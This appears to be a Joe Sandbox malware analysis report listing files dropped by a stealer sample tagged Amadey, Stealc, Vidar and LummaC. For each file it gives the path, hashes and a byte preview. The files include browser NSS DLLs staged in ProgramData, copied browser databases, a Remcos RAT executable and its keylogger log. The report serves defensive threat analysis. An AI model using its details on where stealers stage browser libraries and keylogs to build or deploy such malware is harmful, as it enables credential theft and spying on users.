	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	qDvSf4UYM7.exe	Get hash	malicious	Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BFCAAEHJDBKJJKFHJEBK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECAEGHIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGDBAFHJJDAKEBGCFCBGDHDGII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJDBFCAE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KECFIDGCBFBAKEBFBKFBFBAFII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCGDBAKKKFBGDHJKFHJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJKEHIIJJECFHJKECFHD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\Remcos\logs.dat

Download File

Process:	C:\ProgramData\Remcos\remcos.exe
File Type:	data
Category:	dropped
Size (bytes):	498
Entropy (8bit):	3.2276289755047776
Encrypted:	false
SSDEEP:	12:6ldLec0WFe5BWFe5BWFe5BWFe5BWFe52WFe3:6v6c0WqBWqBWqBWqBWq2Wi
MD5:	C216AA1C212EDC227357881DF0D18F24
SHA1:	530D99B42B46EE5D67A516920A5D28E11124430F
SHA-256:	D7126BD809332066A2A12A4443415093AB3F81D3C821F13B82536A716674095C
SHA-512:	99EA35B8A63FA8BC6BBEE3C72DE3629EFB82A13935A7ECED8DFB21256092F9F0F26C944C9595141B86DDA801FB309F21F9D8EEB431B5B57849F099C8A56634EC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\Remcos\logs.dat, Author: Joe Security
Preview:	....[.2.0.2.4./.1.1./.0.6. .2.2.:.1.3.:.1.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.

C:\ProgramData\Remcos\remcos.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1948672
Entropy (8bit):	7.9458625437066575
Encrypted:	false
SSDEEP:	49152:nagZNlJJziNRWZVTyrNR6yUd/dSlilQBsq5jL:nawNlvWNRlrHSGRBsqR
MD5:	B85C47881BA0EB0B556B83827F8E75C8
SHA1:	DCCDF0DAEE468F9E9BED3EDF928F0839D26B47CB
SHA-256:	9D577624ACCA69F5B4097A6882E934B026A344757CF5CF31F3341E643ED2BA20
SHA-512:	CA158AFF36E4EEFF5D1C263A79972DFA0AA7584132F12A3D301A5CC5C47B57309FE71B4837C7B8CAA5022CB18529B565D6A0849ACDABD1AF939B76B48284A605
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H....(..H......H....+..H...0]..H..&....H... ...H... ...H... ...H...0J..H...H...I...!...H...!&..H...!...H..Rich.H..........PE..L...k.$g.................`...$........K......p....@...........................K......_......................................d...x....`...M...................dK.............................pdK..................................................... . .P..........................@....rsrc....M...`......................@....idata ............................@... .0.........................@...zncloxxx......1.....................@...sftjullu......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................

C:\ProgramData\chrome.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	692736
Entropy (8bit):	6.304379785339226
Encrypted:	false
SSDEEP:	12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
MD5:	EDA18948A989176F4EEBB175CE806255
SHA1:	FF22A3D5F5FB705137F233C36622C79EAB995897
SHA-256:	81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
SHA-512:	160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: g7TubE2bYo.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: qDvSf4UYM7.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m\|5.l<M.m\|5.l.M.m\|5.l#M.m'..l"M.m'..l'M.m'..l.M.m\|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\buildd.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1498
Entropy (8bit):	5.364175471524945
Encrypted:	false
SSDEEP:	24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
MD5:	1B713A2FD810C1C9A8F6F6BE36F406B1
SHA1:	0828576CB8B83C21F36AD29E327D845AB3574EBB
SHA-256:	E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
SHA-512:	D32200B7FA9D0DFEF4011D98D40260838A522E63C874FBCCE00D331D663169DBE1C613AD0E81C76F69A8CE6C7265605175CA75BA2C8BDA7748290B34579E148B
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\315ef68721.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3155968
Entropy (8bit):	6.674619156597174
Encrypted:	false
SSDEEP:	49152:NPZS2Fpw/O09/np3pGHBMIzc69fcinXsU:NPZS2FpI/2HBBc2cinX9
MD5:	A17F03DADDF4FFD5B038F13CA94CCA7D
SHA1:	BA20321C4F47082502DADDDEC7A70769C21E253A
SHA-256:	4149DDED7FD91B0ECA160FFF8D1E48D81BD206EF719BD54D1D5F86BC023EB4F9
SHA-512:	7A4D981C68E5BE25078A18AE2844C1842C491F93137B7B3037A3AE2AF9DD1074CE37F33BCF79C7BB9E47EB83A3CEB595918171F09039C2D1D398E7D892479A54
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........00...........@..........................`0......90...@.................................T...h.......@........................................................................................................... . ............................@....rsrc...@...........................@....idata ............................@...xdlmaljh.p......l.................@...lyfosorw..... 0.......0.............@....taggant.0...00.."....0.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
